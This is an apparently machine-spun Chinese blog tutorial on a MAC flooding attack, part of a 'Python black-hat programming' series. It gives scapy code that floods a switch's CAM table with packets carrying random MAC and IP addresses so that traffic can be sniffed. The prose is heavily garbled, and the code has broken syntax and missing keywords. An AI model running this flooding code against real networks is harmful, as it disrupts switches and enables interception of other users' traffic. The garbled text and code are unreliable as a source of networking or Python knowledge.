Menu
0 Comments

Python黑帽编程 3.3 MAC洪水攻击 – 玄魂工作室

全体与会者电话交易机(我只受测验我今天应用的间隔机具)。,本着人所共知的事不得不这么表述)在履历转发进程中依托对CAM表的查询来决定立刻的转发界面,相配的MAC的对应入场不克不及在曲中找到。,这样履历帧将被处置为播送帧。。凸轮台的大量的是高级快车的。,单独的多数进行控告可以希腊字母第12字。,当CAM表记载的MAC地址获得上限时,新的入场将不会的添加到CAM表中。。

鉴于以上所述信条,咱们会一下子看到一任一某一与众不寻常的的风趣的景象。。PC陆续发送履历帧到未知无论到哪里。,而且每个包的源MAC地址是不寻常的的。,当这些子群以十足快的攻击:严厉批评或猛烈攻击发送时,在突破时间内紧的地淤塞迅速转动的凸轮表。。这些伪造的MAC地址雇用了CAM表。,真马 C地址入场无法进入CAM表。。经过电话交易机的诸如此类整齐的单播履历帧都是PROC。。在这种情况下,电话交易机被降职为集中器。。

当电话交易机被降职为集中器后,,咱们可以监控连接到电话交易机主发动机的迷住履历。。

自然,详细间隔器材对ARP洪水的答辩是相异的,现场受测验是贫穷的。。如今让咱们进入程序关系。。

编码技击术

有大量办法来构成随机MAC和IP地址。,因地址的规范体式是在的。,安装起来从容的。。这时要给全部引见的是scapy模块切中要害RandMAC和RandIP办法。这两种办法用于随机优美的体型MAC地址和IP地址。,收执模板参量的办法,优美的体型特定的段的地址。。

拿 … 来说,上面的编码:

#!/usr/bin/python

from scapy.all import *

i=5

(i)

    print RandMAC()

    print RandIP()

    i=i-1

运转发生列举如下图:

图2

假定需求优美的体型紧握段IP,您可以输出使具有特性的模板。。

#!/usr/bin/python

from scapy.all import *

i=5

(i)

    print RandIP(“.*”)

    i=i-1

运转发生列举如下:

图3

在求解随机成绩过后,如今让咱们思索哪样的履历包可以获得这样物镜。让咱们,既然咱们在包中有使具有特性的源IP和MAC,继迅速转动将被记载着陆。。

拿 … 来说ARP包:

Ether(SRC)RandMAC(),dst=FF:FF:FF:FF:FF:FFARP(OP)2,
psrc=
“”, hwdst=FF:FF:FF:FF:FF:FF)/Padding(装填)“X”*18))

拿 … 来说,ICMP包装盒。:

Ether(SRC)RandMAC(“*:*:*:*:*:*”),

dst=RandMAC(“*:*:*:*:*:*”)) / \

IP(SRC)RandIP(“*.*.*.*”),

dst=RandIP(“*.*.*.*”)) / \

ICMP()

处理了这两个玉蜀黍发育不良的穗成绩。,你可以写出使完整的编码。:

图4

#!/usr/bin/python

import sys

from scapy.all import *

import time

iface=”eth0″

if Le())> 2

    iface=[1]

(1)

    packet= Ether(SRC)RandMAC(“*:*:*:*:*:*”),

                  dst=RandMAC(“*:*:*:*:*:*”)) / \

    IP(SRC)RandIP(“*.*.*.*”),

    dst=RandIP(“*.*.*.*”)) / \

    ICMP()

    ()

    sendp(packet,iface=iface,loop=0)

是你这么说的嘛!编码陆续发送ICMP履历包。,来使掉转船头MAC洪水攻击。运转发生列举如下:

图5

2总结

本条文无下去程序的新知识。,抱有希望的理由对交易建立工作关系和以太网有必然的理解。。

下一节,让咱们摸索对VLAN的攻击。。

VLAN攻击做切片已在WeChat订阅号中释放。,炽热的先生输出订阅号码(在下面二维码),从菜单栏> Python黑帽程序,您可以进入。。

检查使完整的辅导的使处于某种状况,请理睬我的微信订阅号(宣匈521),向下的二维码,恢复大蟒蛇。成绩议论请加QQ群。:Hacking (1群):303242737   Hacking (2群):147098303。

 

弄不清楚灵魂去买东西

发表评论

电子邮件地址不会被公开。 必填项已用*标注